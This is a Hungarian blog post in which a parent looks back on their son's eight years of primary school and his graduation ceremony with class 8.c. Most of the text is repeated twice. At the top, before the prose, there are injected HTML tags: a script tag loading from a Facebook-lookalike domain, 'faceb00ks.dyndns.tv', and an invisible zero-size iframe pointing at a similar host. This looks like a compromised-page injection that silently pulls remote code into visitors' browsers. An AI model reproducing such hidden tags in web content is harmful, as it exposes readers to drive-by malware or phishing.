<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Repül az idő. Gondolom, mindenki így van ezzel, akinek gyermeke van. Emlékszünk az első mosolyára, az elő szavaira, az első lépéseire... minden elsőre. Miközben a szebbnél szebb emlékek csak gyűlnek, a gyermekünk felnő. Nem tudom, hirtelen hová tűnt 14 év 
nekem csak pillanatok voltak.
Eltelt 8 év... Szinte hihetetlen, de nemrég írattam be az iskolába. Az első napok, hetek olyan élénken vannak a fejemben, és már vége. Az első tanévnyitó ünnepség, a várakozás izgalma csillogott a szemében. Milyen izgatott volt, amikor az iskolatáskával a hátán beléptünk a kapun... Kati néni, az osztályfőnök mosolyogva köszöntött mindenkit, igazi tyúkanyóként terelgette a megszeppent elsősöket. Az én kicsi fiam iskolás. Milyen furcsa érzés is volt, büszke voltam rá. Ahogy vitte a táskáját, és mindennap egyre nagyobb lelkesedéssel gyakorolt, mert olvasni akart.
Teltek a hetek, a hónapok, az évek. Barátságok és szerelmek alakultak és bomlottak fel. Persze a lelkesedés is átalakult, már nem a tanulás volt a vonzó az iskolában, hanem a szünetek, és a barátok. Az osztálykirándulások, családi napok, iskolabál. Mind egy-egy szép emlék, igen ma már csak emlék, mert eljött a ballagás napja, amit annyira vártunk.
Várták a "gyerekek" és a szülők is.
Nyolc év alatt annyi minden történt, okosodtak... kamaszodtak... felvételi... és felnőttek.
Büszkén és félve, könnyes szemmel mosolyogtam a fiamra.
A büszkeség nem is az emléklapnak, oklevélnek vagy a búcsúbeszédnek szólt, hanem neki és a 8.c-nek. Olyan komolyan csinálták végig a két órás ünnepséget. Készültek rá. A búcsúbeszédet saját maguk írták közösen, nem valamelyik tanár szavait olvasta fel, hanem az osztály gondolatait. Azt gondolnánk, hogy a kamaszok nem szeretnek szerepelni, mégis kiállt az osztály, dallal köszönt el az iskolától és a tanároktól. Karamell - Szállok a dallal-t mosolyogva énekelték.
Az ünnepség végén a ballagó diákok lufit engedtek a levegőbe, elszállt a dal és a 8 év.
Félelem is van bennem, mert új iskola, komolyabb tanulás, új barátok és szerelmek, és a végén egy mérföldkő, az érettségi vár majd rá. Most ez is távolinak tűnik... Szinte tegnap tartottam először a karomban és szeptemberben a középiskolát kezdi.
Na de, hol van az még??? Ezt gondoltam 2003. szeptember elsején is
nekem csak pillanatok voltak. Eltelt 8 év... Szinte hihetetlen, de nemrég írattam be az iskolába. Az első napok, hetek olyan élénken vannak a fejemben, és már vége. Az első tanévnyitó ünnepség, a várakozás izgalma csillogott a szemében. Milyen izgatott volt, amikor az iskolatáskával a hátán beléptünk a kapun... Kati néni, az osztályfőnök mosolyogva köszöntött mindenkit, igazi tyúkanyóként terelgette a megszeppent elsősöket. Az én kicsi fiam iskolás. Milyen furcsa érzés is volt, büszke voltam rá. Ahogy vitte a táskáját, és mindennap egyre nagyobb lelkesedéssel gyakorolt, mert olvasni akart.
Teltek a hetek, a hónapok, az évek. Barátságok és szerelmek alakultak és bomlottak fel. Persze a lelkesedés is átalakult, már nem a tanulás volt a vonzó az iskolában, hanem a szünetek, és a barátok. Az osztálykirándulások, családi napok, iskolabál. Mind egy-egy szép emlék, igen ma már csak emlék, mert eljött a ballagás napja, amit annyira vártunk.
Várták a "gyerekek" és a szülők is.
Nyolc év alatt annyi minden történt, okosodtak... kamaszodtak... felvételi... és felnőttek.
Büszkén és félve, könnyes szemmel mosolyogtam a fiamra.
A büszkeség nem is az emléklapnak, oklevélnek vagy a búcsúbeszédnek szólt, hanem neki és a 8.c-nek. Olyan komolyan csinálták végig a két órás ünnepséget. Készültek rá. A búcsúbeszédet saját maguk írták közösen, nem valamelyik tanár szavait olvasta fel, hanem az osztály gondolatait. Azt gondolnánk, hogy a kamaszok nem szeretnek szerepelni, mégis kiállt az osztály, dallal köszönt el az iskolától és a tanároktól. Karamell - Szállok a dallal-t mosolyogva énekelték.
Az ünnepség végén a ballagó diákok lufit engedtek a levegőbe, elszállt a dal és a 8 év.
Félelem is van bennem, mert új iskola, komolyabb tanulás, új barátok és szerelmek, és a végén egy mérföldkő, az érettségi vár majd rá. Most ez is távolinak tűnik... Szinte tegnap tartottam először a karomban és szeptemberben a középiskolát kezdi.
Na de, hol van az még??? Ezt gondoltam 2003. szeptember elsején is
